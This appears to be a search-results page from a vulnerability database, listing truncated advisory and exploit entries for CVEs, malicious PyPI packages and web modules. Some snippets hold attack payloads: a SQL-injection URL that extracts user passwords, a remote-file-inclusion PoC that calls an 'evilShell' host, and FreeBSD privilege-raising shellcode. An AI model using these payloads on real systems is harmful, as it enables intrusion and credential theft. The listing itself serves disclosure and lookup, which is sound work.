25 matches found
EUVD-2007-0656
Malware in sbrugna...
EUVD-2018-0617
Malware in sbrugna...
EUVD-2017-11849
Malware in sbrugna...
EUVD-2018-18511
Malware in sbrugna...
EUVD-2019-2256
Malware in sbrugna...
EUVD-2025-5950
Malicious code in bioql PyPI...
CVE-2024-51516
Permission control vulnerability in the ability module Impact: Successful exploitation of this vulnerability may cause features to function abnormally...
Invision Community 5.0.6 customCss RCE
Invision Community up to and including version 5.0.6 contains a remote code execution vulnerability in the theme editor's customCss endpoint. By crafting a specially formatted content parameter with a expression="..." construct, arbitrary PHP can be evaluated. This module leverages that flaw to...
Linux Distros Unpatched Vulnerability : CVE-2025-1125
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - When reading data from a hfs filesystem, grub's hfs filesystem module uses user-controlled parameters from the filesystem metadata to calculate the internal...
CVE-2024-55893
TYPO3 CVE-2024-55893 is a CSRF vulnerability in the backend UI deep-link handling and in the Log Module that can let an attacker remove log entries. Exploitation requires an active session and a user interaction with a malicious URL, aided by misconfigurations: security.backend.enforceReferrer di...
CVE-2023-39180
CVE-2023-39180 affects the Linux kernel ksmbd module. The root cause is improper memory release after the memory’s lifetime in SMB2_READ handling, enabling a network-based DoS without authentication on systems with ksmbd enabled. Public details confirm impact as denial-of-service; no vendor patch...
PT-2023-4573
Name of the Vulnerable Software and Affected Versions Python versions 0 through 2.7.18 Python versions 3.x through 3.11.3 Description The email module of Python incorrectly parses e-mail addresses that contain a special character, allowing attackers to bypass protection mechanisms. This can be...
GHSA-Q886-75M2-VFF8 Duplicate Advisory: Unauthorized privilege escalation in Mod module
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-mp9m-g7qj-6vqr. This link is maintained to preserve external references. Original Description Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit...
Synology DiskStation Manager 访问控制错误漏洞
Synology DiskStation Manager DSM is an operating system for use on Network Storage Servers NAS from Synology Inc. of Taiwan, China. This operating system manages information such as data, files, photos, music, and more. An improper access control vulnerability exists in synoagentregisterd in...
Using the memory corruption vulnerability in the Python sandbox escape-vulnerability warning-the black bar safety net
Simply skip the text the author's README, we directly enter into the technical details. The Python environment using a custom whitelist/blacklist programs to prevent access to dangerous built-in functions, modules, functions, etc. Based on theoperating systemthe isolation provides some additional...
KwsPHP 1.0 mg2 Module - SQL Injection
KwsPHP 1.0 mg2 Module - SQL Injection -------------------- KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit -------------------- Found : xoron -------------------- Exploit: Name: index.php?mod=mg2&album=-1//union//select//0,1,pseudo,3,4,5//from//users//where//id=1/ Pass:...
xoops101-rfi.txt
!/usr/bin/perl sub header print q ========================================================================= XOOPS modules xfsection 1.01 =Remote File Inclusion Exploit Exploit Coded by fl0 fl0w floflowsupremacyatyahoodotcom PoC:http://site.com/modules/xfsection/modify.php?dirmodule=evilShell?...
XOOPS Module myAlbum-P 2.0 - cid SQL Injection
XOOPS Module myAlbum-P 2.0 - cid SQL Injection !/usr/bin/perl Script Name: XOOPS Module myAlbum-P : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id;...
USN-320-1: PHP vulnerabilities
The phpinfo PHP function did not properly sanitize long strings. A remote attacker could use this to perform cross-site scripting attacks against sites that have publicly-available PHP scripts that call phpinfo. Please note that it is not recommended to publicly expose phpinfo. CVE-2006-0996 An...
freebsd/x86 kldload /tmp/o.o 74 bytes
No description provided by source. / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax int 0x80 xor eax,eax push eax push long 0x68732f...